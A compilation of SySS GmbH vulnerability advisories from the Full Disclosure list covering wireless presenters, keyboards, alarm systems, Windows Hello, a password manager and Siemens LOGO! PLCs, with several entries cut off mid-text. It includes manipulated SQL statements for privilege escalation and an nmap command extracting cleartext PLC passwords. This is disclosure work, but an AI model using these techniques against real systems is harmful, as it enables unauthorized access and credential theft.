-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-075 Product: Multimedia Presentation Remote Manufacturer: Targus Affected Version(s): Model AMP09-EU Tested Version(s): Model AMP09-EU Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Mouse Spoofing Attack Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-08-16 Solution Date: - Public Disclosure: 2016-10-12 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg (SySS GmbH) Overview: Targus Multimedia Presentation Remote is a wireless presenter using 2.4 GHz radio communication. The manufacturer describes the product as follows (see [1]): "Don't fumble around with wires or fuss over the computer; present like a professional and control your computer remotely, using just one device - the Targus Multi Media Presentation Remote with Cursor Control. Thanks to the remote's 2.4GHz cordless technology, you can access programmes, launch the internet, adjust volumes and play music and videos, all from up to 15 metres away." Due to unencrypted and unauthenticated mouse data communication, the wireless presenter Targus Multimedia Presentation Remote is vulnerable to mouse spoofing attacks. Vulnerability Details: The SySS GmbH found out that the wireless presenter Targus Multimedia Presentation Remote is prone to mouse spoofing attacks, as the cursor control data communication is unencrypted and unauthenticated. An attacker can analyze the unencrypted cursor control data packets of the 2.4 GHz radio communication sent by the wireless presenter to the receiver (USB dongle) in order to learn the used protocol. By knowing the used mouse data protocol, it is possible to spoof mouse actions like mouse movements or mouse clicks by sending forged data packets. Thus, an attacker is able to remotely control the mouse pointer of a target system that is operated with the wireless presenter Targus Multimedia Presentation Remote. If the graphical user interface of the victim's system is unlocked, an attacker can for example send a list of mouse actions that start the virtual on-screen keyboard of the operating system and execute arbitrary commands in the context of the currently logged in user, for instance a download and execute attack vector. As the attacker may not have an unobstructed view to the target system's screen and may not know the used operating system, the screen resolution, or the current mouse settings, this kind mouse spoofing attack is based on heuristics. But concerning an unlocked and unattended system, an attacker can simply try different attack vectors for different target system configurations sequentially. Proof of Concept (PoC): The SySS GmbH could successfully perform mouse spoofing attacks against a target system operated with the wireless presenter Targus Multimedia Presentation Remote using an in-house developed software tool in combination with the USB radio dongle Crazyradio PA and the nrf-research-firmware by Bastille Networks Internet Security (see [2] and [3]). A proof-of-concept mouse spoofing attack that also applies to the wireless presenter Targus Multimedia Presentation Remote resulting in remote code execution using the SySS software tool Radioactive Mouse is demonstrated in a video (see [4]). Solution: The SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-08-16: Vulnerability reported to manufacturer 2016-08-16: Manufacturer acknowledges e-mail with SySS security advisory 2016-10-12: Public release of the security advisory References: [1] Product website for Targus Multimedia Presentation Remote http://targus.com/uk/multimedia-presentation-remote-amp09eu [2] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [3] Bastille's nRF24 research firmware and tools https://github.com/BastilleResearch/nrf-research-firmware [4] SySS Proof-of-Concept Mouse Spoofing Attack Video https://www.youtube.com/watch?v=PkR8EODee44 [5] SySS Security Advisory SYSS-2016-075 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-075.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of the SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public
[FD] [SYSS-2015-035] Password Safe and Repository Enterprise v7.4.4 - SQL Injection (CWE-89)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Advisory ID: SYSS-2015-035
Product(s): Password Safe and Repository Enterprise
Manufacturer: MATESO GmbH
Affected Version(s): 7.4.4 Build 2247
Tested Version(s): 7.4.4 Build 2247
Vulnerability Type: Violation of Secure Design Principles (CWE-657)
SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-07-09
Solution Date: 2016-10-18
Public Disclosure: 2017-04-10
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)
~~~
Overview:
Password Safe and Repository Enterprise is a password management
software for companies with many features.
The vendor MATESO GmbH describes the product as follows (see [1]):
"Manage your passwords in the company according to your security needs!
Features such as password policies, multi-eyes principle, workflow and
task system makes management productive and safe.
The integrated rights management system with data transfer option and
automatic synchronization with Active Directory ensures that your
employees can only access data which they are entitled to."
~~~
Vulnerability Details:
SySS GmbH found out that the password management software Password Safe
and Repository Enterprise violates secure design principles and
insufficiently implements user input validation concerning database
access via SQL statements.
These vulnerabilities enable an attacker to manipulate SQL statements
on the client side using a "malicious client" in order to perform
privilege escalation attacks or to gain authorized read and write
access to other user's data.
Different SQL statements that are created on the client side in the
context of different functionalities of the password management client
software can be manipulated and thus exploited for such attacks.
These vulnerabilities both affect the online and the offline mode of the
password management software, but there may be different requirements
for a successful exploitation like valid user credentials.
Proof of Concept (PoC):
1) Privilege escalation by retrieving information of another user
In order to perform a privilege escalation attack in the online mode
of the password management software Password Safe and Repository
Enterprise from the perspective of an authorized low-privileged user,
the parameter "ID" of the following SQL statement simply has to be
manipulated:
SELECT * FROM tdUsers WHERE ID=
This SQL statement is used by the client software in the online mode for
retrieving user information from the server system after a successful
user login. If the parameter "ID" is set to a valid user ID of another
existing user, for example the built-in administrator account who has
usually the user ID 1, the application can be used with the privileges
of the user with the chosen user ID.
2) Privilege escalation by setting new user rights
Another possibility to perform a privilege escalation attack in the
online mode from the perspective of a low-privileged user is to
manipulate the following SQL statement that is used to update the
user's last login date:
UPDATE tdUsers SET LastLogin = julianday(''), ChangeDate =
julianday('') WHERE ID =
By replacing this UPDATE SQL statement by the following one, the user
rights of an arbitrary user can be modified, for example by setting
all available rights:
UPDATE tdUsers SET UserRights =
'11' WHERE ID =
Solution:
The MATESO GmbH released the new software version Password Safe and
Repository Enterprise 8 that is not affected by the described security
issues.
Please contact the manufacturer for further information or support.
Disclosure Timeline:
2015-07-09: Vulnerability reported to manufacturer
2015-07-09: Manufacturer acknowledges e-mail with SySS security advisory
2015-07-30: Scheduling of the publication date in agreement with the
manufacturer
2015-10-02: Rescheduling of the publication date in agreement with the
manufacturer
2016-10-18: Manufacturer presents new software version with fixed
security issues
2017-04-10: Public release of security advisory
References:
[1] Product website for Password Safe and Repository Enterprise
http://www.passwordsafe.de/en/products/business/enterprise-edition.html
[2] SySS Security Advisory SYSS-2015-035
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-035.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.
[FD] [SYSS-2015-036] Password Safe and Repository Enterprise v7.4.4 - Violation of Secure Design Principles (CWE-657)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2015-036 Product(s): Password Safe and Repository Enterprise Manufacturer: MATESO GmbH Affected Version(s): 7.4.4 Build 2247 Tested Version(s): 7.4.4 Build 2247 Vulnerability Type: Credentials Management (CWE-255) Violation of Secure Design Principles (CWE-657) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2015-07-09 Solution Date: 2016-10-18 Public Disclosure: 2017-04-10 CVE Reference: Not yet assigned Author of Advisory: Matthias Deeg (SySS GmbH) ~~~ Overview: Password Safe and Repository Enterprise is a password management software for companies with many features. The vendor MATESO GmbH describes the product as follows (see [1]): "Manage your passwords in the company according to your security needs! Features such as password policies, multi-eyes principle, workflow and task system makes management productive and safe. The integrated rights management system with data transfer option and automatic synchronization with Active Directory ensures that your employees can only access data which they are entitled to." ~~~ Vulnerability Details: SySS GmbH found out that synchronized databases (offline databases) created by a specific user also contain sensitive data of other users, for example login credentials. The password information of other users are stored as raw, unsalted MD5 hash values in the database table tdUsers (see SYSS-2015-037). Thus, by having access to an offline database, it is possible to access password information of other users, for example the MD5 password hash of the built-in administrator account. This password information may be recovered during password guessing attacks and used for accessing foreign user data in an unauthorized way or for performing privilege escalation attacks in the online mode. Proof of Concept (PoC): In the offline mode of the password management software Password Safe and Repository, it is possible to manipulate SQL statements due to the violation of secure design principles and SQL injection vulnerabilities (see SYSS-2015-035). By using the following SQL statement, user information of all users unnecessarily stored in the database table tdUsers can be retrieved from an offline database and extracted from memory of the password management software, for example by using a modified client software: SELECT * FROM tdUsers Solution: The MATESO GmbH released the new software version Password Safe and Repository Enterprise 8 that is not affected by the described security issues. Please contact the manufacturer for further information or support. Disclosure Timeline: 2015-07-09: Vulnerability reported to manufacturer 2015-07-09: Manufacturer acknowledges e-mail with SySS security advisory 2015-07-30: Scheduling of the publication date in agreement with the manufacturer 2015-10-02: Rescheduling of the publication date in agreement with the manufacturer 2016-10-18: Manufacturer presents new software version with fixed security issues 2017-04-10: Public release of security advisory References: [1] Product website for Password Safe and Repository Enterprise http://www.passwordsafe.de/en/products/business/enterprise-edition.html [2] SySS Security Advisory SYSS-2015-036 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-036.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAljrOqMACgkQ2aS/a
[FD] [SYSS-2017-027] Microsoft Windows Hello Face Authentication - Authentication Bypass by Spoofing (CWE-290)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2017-027 Product: Microsoft Windows Hello Face Authentication Manufacturer: Microsoft Affected Version(s): Windows 10 Pro (Version 1709, OS Build 16299.19) Windows 10 Pro (Version 1703, OS Build 15063.726) Windows 10 Pro (Version 1703, OS Build 15063.674) Windows 10 Pro (Version 1703, OS Build 15063.483) Windows 10 Pro (Version 1607, OS Build 14393.1914) Windows 10 Pro (Version 1607, OS Build 14393.1770) Windows 10 Pro (Version 1511, OS Build 10586.1232) Tested Version(s): Windows 10 Pro (Version 1709, OS Build 16299.19) Windows 10 Pro (Version 1703, OS Build 15063.726) Windows 10 Pro (Version 1703, OS Build 15063.674) Windows 10 Pro (Version 1703, OS Build 15063.483) Windows 10 Pro (Version 1607, OS Build 14393.1914) Windows 10 Pro (Version 1607, OS Build 14393.1770) Windows 10 Pro (Version 1511, OS Build 10586.1232) Vulnerability Type: Authentication Bypass by Spoofing (CWE-290) Risk Level: High Solution Status: Fixed on Windows 10 branches 1703 and 1709 with enabled "enhanced anti-spoofing" feature Manufacturer Notification: 2017-10-20 Solution Date: 2017-12-18 Public Disclosure: 2017-12-18 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Philipp Buchegger (SySS GmbH) Overview: Microsoft Windows 10 offers a biometric authentication mechanism using "near infrared" face recognition technology with specific Windows Hello compatible cameras. The manufacturer Microsoft describes the face authentication feature as follows (see [1]): "Microsoft face authentication in Windows 10 is an enterprise-grade identity verification mechanism that's integrated into the Windows Biometric Framework (WBF) as a core Microsoft Windows component called Windows Hello. Windows Hello face authentication utilizes a camera specially configured for near infrared (IR) imaging to authenticate and unlock Windows devices as well as unlock your Microsoft Passport." Further information about how Windows Hello works and its metrics concerning false acceptance rate (FAR) and false rejection rate (FRR) can also be found on the Microsoft website (see [2]). Due to an insecure implementation of the biometric face recognition in some Windows 10 versions, it is possible to bypass the Windows Hello face authentication via a simple spoofing attack using a modified printed photo of an authorized person. Vulnerability Details: SySS GmbH discovered that the Microsoft Windows Hello face authentication using near infrared cameras in some Windows 10 versions is vulnerable to simple spoofing attacks. By using a modified printed photo of an authorized user, an unauthorized attacker is able to log in to or unlock a locked Windows 10 system as this spoofed authorized user. Thus, by having access to a suitable photo of an authorized person (frontal face photo), Windows Hello face authentication can easily be bypassed with little effort, enabling unauthorized access to the Windows system. Both, the default Windows Hello configuration and Windows Hello with the enabled "enhanced anti-spoofing" feature on different Windows 10 versions are vulnerable to the described spoofing attack and can be bypassed. If "enhanced anti-spoofing" is enabled, depending on the targeted Windows 10 version, a slightly different modified photo with other attributes has to be used, but the additional effort for an attacker is negligible. In general, the simple spoofing attack is less reliable when the "enhanced anti-spoofing" feature is enabled. Proof of Concept (PoC): SySS GmbH could successfully bypass the configured Windows Hello user authentication with face recognition on two Windows 10 systems using a modified printed photo (paper printout) of an authorized user. For example, the spoofing attack was performed against a laptop device (Dell Latitude E7470) running Windows 10 Pro (Version 1703) with a Windows Hello compatible webcam [3] and against a Microsoft Surface Pro 4 device [4] running Windows 10 Pro (Version 1607) with the built-in camera. Only the used Microsoft Surface Pro 4 device supported the "enhanced anti-spoofing" feature of Windows 10. The used LilBit USB IR camera only supported the default configuration and could not be used with the more secure face recognition settings. The default Windows Hello configuration could successfully be bypassed on both test devices with all tested Windows 10 versions. The more secure
[FD] [SYSS-2017-026] Microsoft Surface Hub Keyboard - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2017-026 Product: Microsoft Surface Hub Keyboard Manufacturer: Microsoft Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Cryptographic Issues (CWE-310) Insufficient Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2017-10-20 Solution Date: - Public Disclosure: 2018-01-29 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg (SySS GmbH) Overview: The Microsoft Surface Hub Keyboard is a wireless keyboard that can be used in combination with the digital whiteboard/collaboration system Microsoft Surface Hub (see [1]). Due to an insecure implementation of the encrypted data communication, the Microsoft Surface Hub Keyboard is vulnerable to replay attacks with certain restrictions. Vulnerability Details: The SySS GmbH found out that the Microsoft Surface Hub Keyboard Keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data causing the same effect as the original data communication. According to test results of the SySS GmbH, the Microsoft Surface Hub Keyboard and its USB dongle have implemented a replay protection based on an incrementing packet counter. But the used window for valid packet counter values is large enough to perform a replay attack if there were not too many data packets caused by further keystrokes between the attacker's recording and the playback. The same behavior was found in the previously tested wireless keyboard Microsoft Wireless Desktop 2000 (see [2]). A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and by this gets unauthorized access to the victim's system. Proof of Concept (PoC): SySS GmbH could successfully perform a replay attack as described in the previous section using the USB radio dongle Crazyradio PA (see [3]) and the proof-of-concept software tool simple_replay.py that is part of the SySS nRF24 Playset (see [4]). Solution: According to information from the manufacturer, the reported security issue does not meet the requirements for a security patch. For further information, please contact the manufacturer. Disclosure Timeline: 2017-10-20: Vulnerability reported to manufacturer 2017-10-20: Manufacturer acknowledges e-mail with SySS security advisory 2017-11-30: E-mail from manufacturer with open questions 2017-12-01: E-mail to manufacturer concerning open questions 2017-12-08: E-mail from manufacturer with open questions regarding attack scenarios and preconditions 2017-12-11: E-mail to manufacturer concerning open questions, attack scenarios, and preconditions 2017-12-11: E-mail from manufacturer that the reported security issue and its exploitability does not meet the bar for a security patch 2017-12-13: E-mail to manufacturer explaining - from a SySS point of view - the feasibility of actual replay attacks that exploit the reported security vulnerability 2018-01-29: Public release of security advisory References: [1] Product website for Microsoft Surface Hub https://www.microsoft.com/en-us/surface/devices/surface-hub/overview [2] SySS Security Advisory SYSS-2016-043 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-043.txt [3] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [4] SySS nRF24 Playset https://github.com/SySS-Research/nrf24-playset [5] SySS Security Advisory SYSS-2017-026 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-026.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found
[FD] [SYSS-2018-035]: ABUS Secvest Remote Control - Missing Encryption of Sensitive Data (CWE-311)
Advisory ID: SYSS-2018-035 Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015) Manufacturer: ABUS Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311) Risk Level: High Solution Status: Open Manufacturer Notification: 2018-11-21 Solution Date: - Public Disclosure: 2019-03-25 CVE Reference: CVE-2019-9862 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are (see [1]): " * User-friendly remote control with easily identifiable symbols * Features ‘arm’, ‘disarm’ and ‘status query’ keys * 8 LEDs provide an overview and display current system status * Button for custom configuration available (Secvest wireless alarm system only) * Optional manual panic alarm available (Secvest wireless alarm system only) * Encrypted signal transmission * Rolling Code Thanks to the rolling code process this product is protected against so-called replay attacks. All controlling signals between this product and the Secvest alarm panel are in individualised and thus, are not able to be reproduced by third parties. This process is protected from third party tampering, and exceeds the requirements of the DIN EN 50131-1 level 2 security standard. " Due to the missing "Encrypted signal transmission", an attacker is able to eavesdrop sensitive data as cleartext, for instance the current rolling code state. Vulnerability Details: Thomas Detert found out that the claimed "Encrypted signal transmission" of the Secvest wireless remote control FUBE50014 is not present at all. Thus, an attacker observing radio signals of an ABUS FUBE50014 wireless remote control is able to see all sensitive data of transmitted packets as cleartext and can analyze the used packet format and the communication protocol. For instance, this security issue could successfully be exploited to observe the current rolling code state of the wireless remote control and deduce the cryptographically weak used rolling code algorithm (see SySS security advisory SYSS-2018-034 [2]). SySS found out that the new ABUS Secvest remote control FUBE50015 is also affected by this security vulnerability. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows disarming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. SySS GmbH could successfully perform a disarming attack against an ABUS Secvest wireless alarm system by exploiting the unencrypted signal transmission of the ABUS Secvest wireless remote controls FUBE50014 and FUBE50015 and the predictable rolling code implementation using either Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio dongle YARD Stick One (see [3]), or a eZ430-Chronos (see [4]) with a specially developed firmware. Successful disarming attacks against an ABUS Secvest wireless alarm system are shown in our SySS proof-of-concept video "ABUS Secvest Rolling Code PoC Attack" [7]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2018-11-21: Vulnerability reported to manufacturer 2018-11-28: Vulnerability reported to manufacturer once more 2018-12-12: E-mail to ABUS support asking if they are going to give some feedback regarding the reported security issue 2018-12-12: Phone call with ABUS support, the reported security advisories were forwarded to the ABUS Security Center Support 2018-12-12: E-mail to ABUS Security Center Support asking if they are going to give some feedback regarding the reported security issue 2019-01-14: Updated information regarding remote control ABUS Secvest FUBE50015 2019-03-25: Public release of security advisory References: [1] Product website for ABUS Secvest wireless remote control https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2 [2] SySS Security Advisory SYSS-2018-034 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-034.txt [3] Product website YARD Stick One https://greatscottgadgets.com/yardstickone/ [4] Product website for
[FD] [SYSS-2018-034]: ABUS Secvest - Rolling Code - Predictable from Observable State (CWE-341)
Advisory ID: SYSS-2018-034 Product: ABUS Secvest (FUAA5) Manufacturer: ABUS Affected Version(s): v3.01.01 Tested Version(s): v3.01.01 Vulnerability Type: Rolling Code - Predictable from Observable State (CWE-341) Risk Level: High Solution Status: Open Manufacturer Notification: 2018-11-21 Solution Date: - Public Disclosure: 2019-03-25 CVE Reference: CVE-2019-9863 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest (FUAA5) is a wireless alarm system with different features. Some of the supported features as described by the manufacturer are (see [1]): " * Convenient operation via the app (Android/iOS), integrated web browser and also at the alarm panel * For up to 50 users with freely selectable control options (code/chip key/remote control) * Active intrusion protection in combination with additional mechatronic wireless window/door locks * Video verification of alarms via email, push notifications or via the app * Up to 48 individually identifiable wireless detectors, eight control panels, 50 remote controls * Integrated dialling device * VdS Home certified and EN 50131-1 Level 2 * Alarm verification via the integration of up to six IP cameras * 32 additional wireless outputs for flexible event control * Switching to monitoring station via protocols possible " Due to the use of an insecure algorithm for rolling codes, an attacker is able to predict valid future rolling codes and can thus remotely control the ABUS Secvest wireless alarm system in an unauthorized way. Vulnerability Details: Thomas Detert found out that the rolling codes implemented as replay protection (see SySS security advisory SYSS-2016-117 [2]) in the radio communication protocol used by the ABUS Secvest wireless alarm system (FUAA5) and its remote control (FUBE50014, FUB50015) is cryptographically weak. Thus, an attacker observing the unencrypted radio signals of an ABUS FUBE50014 or FUBE50015 wireless remote control (see SySS security advisory SYSS-2018-035 [6]) is able to deduce the implemented rolling code algorithm and to correctly predict valid future rolling codes. This enables an attacker to remotely control affected wireless alarm systems in an unauthorized manner, for instance disarming the wireless alarm system at will. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows disarming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. SySS GmbH could successfully perform a disarming attack against an ABUS Secvest wireless alarm system by exploiting the unencrypted signal transmission of the ABUS Secvest wireless remote controls FUBE50014 and FUBE50015 and the predictable rolling code implementation using either Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio dongle YARD Stick One (see [3]), or a eZ430-Chronos (see [4]) with a specially developed firmware. Successful disarming attacks against an ABUS Secvest wireless alarm system are shown in our SySS proof-of-concept video "ABUS Secvest Rolling Code PoC Attack" [8]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2018-11-21: Vulnerability reported to manufacturer 2018-11-28: Vulnerability reported to manufacturer once more 2018-12-12: E-mail to ABUS support asking if they are going to give some feedback regarding the reported security issue 2018-12-12: Phone call with ABUS support, the reported security advisories were forwarded to the ABUS Security Center Support 2018-12-12: E-mail to ABUS Security Center Support asking if they are going to give some feedback regarding the reported security issue 2019-01-14: Updated information regarding remote control ABUS Secvest FUBE50015 2019-03-25: Public release of security advisory References: [1] Product website for ABUS Secvest wireless alarm system https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System [2] SySS Security Advisory SYSS-2016-117 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-117.txt [3] Product website YARD Stick One https://greatscottgadgets.com/yardstickone/ [4] Product website for Texas Instruments eZ430-Chronos http://www.ti.com/tool/EZ430-CHRONOS [5] Sy
[FD] [SYSS-2018-036]: ABUS Secvest Remote Control - Denial of Service - Uncontrolled Resource Consumption (CWE-400)
Advisory ID: SYSS-2018-036 Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015) Manufacturer: ABUS Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Denial of Service - Uncontrolled Resource Consumption (CWE-400) Risk Level: Low Solution Status: Open Manufacturer Notification: 2018-11-21 Solution Date: - Public Disclosure: 2019-03-25 CVE Reference: CVE-2019-9860 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are (see [1]): " * User-friendly remote control with easily identifiable symbols * Features ‘arm’, ‘disarm’ and ‘status query’ keys * 8 LEDs provide an overview and display current system status * Button for custom configuration available (Secvest wireless alarm system only) * Optional manual panic alarm available (Secvest wireless alarm system only) * Encrypted signal transmission * Rolling Code Thanks to the rolling code process this product is protected against so-called replay attacks. All controlling signals between this product and the Secvest alarm panel are in individualised and thus, are not able to be reproduced by third parties. This process is protected from third party tampering, and exceeds the requirements of the DIN EN 50131-1 level 2 security standard. " Due to unencrypted signal communication and predictability of rolling codes, an attacker can "desynchronize" an ABUS Secvest wireless remote control regarding its controlled Secvest wireless alarm system, so that sent commands by the remote control are not accepted anymore. Vulnerability Details: Thomas Detert found out that the claimed "Encrypted signal transmission" of the Secvest wireless remote control FUBE50014 is not present (see SySS security advisory SYSS-2018-035 [2]) and that the implemented rolling codes are predictable (see SySS security advisory SYSS-2018-034 [3]). By exploiting these two security issues, an attacker can simply desynchronize a wireless remote control by observing the current rolling code state, generating many valid rolling codes, and use them before the original wireless remote control. The Secvest wireless alarm system will ignore sent commands by the wireless remote control until the generated rolling code happens to match the window of valid rolling code values again. Depending on the number of used rolling codes by the attacker, a resynchronization without actually reconfiguring the wireless remote control could take quite a lot of time and effectless button presses. SySS found out that the new ABUS Secvest remote control FUBE50015 is also affected by this security vulnerability. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows disarming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. Based on Mr. Detert's PoC tool, SySS GmbH developed a Python tool for the RFCat-based radio dongle YARD Stick One (see [4]) for demonstrating this simple denial-of-service (DoS) attack against the ABUS Secvest wireless remote controls FUBE50014 and FUBE50015. This tool simply generates many valid rolling codes based on the current observed state and uses them resulting in desynchronizing the original wireless remote control. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2018-11-21: Vulnerability reported to manufacturer 2018-11-28: Vulnerability reported to manufacturer once more 2018-12-12: E-mail to ABUS support asking if they are going to give some feedback regarding the reported security issue 2018-12-12: Phone call with ABUS support, the reported security advisories were forwarded to the ABUS Security Center Support 2018-12-12: E-mail to ABUS Security Center Support asking if they are going to give some feedback regarding the reported security issue 2019-01-14: Updated information regarding remote control ABUS Secvest FUBE50015 2019-03-25: Public release of security advisory References: [1] Product website for ABUS Secvest wireless remote control https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2 [2] Sy
[FD] [SYSS-2019-014]: Siemens LOGO! 8 - Storing Passwords in a Recoverable Format (CWE-257)
Advisory ID: SYSS-2019-014 Product: LOGO! Manufacturer: Siemens Affected Version(s): LOGO! 8 (all versions) Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03 Vulnerability Type: Storing Passwords in a Recoverable Format (CWE-257) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2019-04-04 Solution Date: 2019-05-14 (recommended mitigation by manufacturer) Public Disclosure: 2019-05-29 CVE Reference: CVE-2019-10921 Authors of Advisory: Manuel Stotz (SySS GmbH), Matthias Deeg (SySS GmbH) Overview: Siemens LOGO! is a programmable logic controller (PLC) for small automation tasks. The manufacturer describes the product as follows (see [1]): "Simple installation, minimum wiring, user-friendly programming: You can easily implement small automation projects with LOGO!, the intelligent logic module from Siemens. The LOGO! Logic Module saves space in the control cabinet, and lets you easily implement functions, such as time-delay switches, time relays, counters and auxiliary relays. " Due to storing passwords in a recoverable format on LOGO! 8 PLCs, an attacker can gain access to configured passwords as cleartext. Vulnerability Details: SySS GmbH found out that passwords are stored in a recoverable format on LOGO! 8 PLCs. Thus, if an attacker finds a way to retrieve this password data, for instance exploiting the security vulnerabilities described in the SySS security advisories SYSS-2019-012 [2] and SYSS-2019-013 [3], direct access to cleartext passwords is given. Proof of Concept (PoC): SySS GmbH could successfully extract sensitive data such as configured passwords as cleartext from a LOGO! 8 using a developed Nmap script. The following Nmap output exemplarily shows extracting cleartext password data from a LOGO! 8 PLC: $ nmap -p 10005 --script slig.nse 192.168.10.112 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 17:21 CEST Nmap scan report for 192.168.10.112 Host is up (0.00044s latency). PORT STATE SERVICE 10005/tcp open stel | slig: Gathered Siemens LOGO!8 access details and passwords | User: LSCUser | Password: S3cret1 | Enabled: True | User: AppUser | Password: S3cret2 | Enabled: True | User: WebUser | Password: S3cret3 | Enabled: True | User: TDUser | Password: S3cret4 | Enabled: True | Protection: Password | Program password: SECRET |_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds A successful attack against a LOGO! 8 extracting all configured passwords is demonstrated in our SySS PoC video [7]. Solution: In the publicly released Siemens Security Advisory SSA-542701 [3], the manufacturer Siemens recommends to apply a defense-in-depth concept, including protection concept outlined in the system manual, as a mitigation for reducing the risk of the described security issue. Disclosure Timeline: 2019-04-04: Vulnerability reported to manufacturer 2019-04-04: Manufacturer confirms receipt of security advisory and asks for referenced Nmap script 2019-04-04: SySS provides PoC Nmap script 2019-05-14: Public release of Siemens Security Advisory SSA-542701 2019-05-29: Public release of SySS security advisory References: [1] Product website for Siemens LOGO! https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html [2] SySS Security Advisory SYSS-2019-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt [3] SySS Security Advisory SYSS-2019-013 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-013.txt [4] SySS Security Advisory SYSS-2019-014 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-014.txt [5] Siemens Security Advisory SSA-542701 https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf [6] SySS Responsible Disclosure Policy 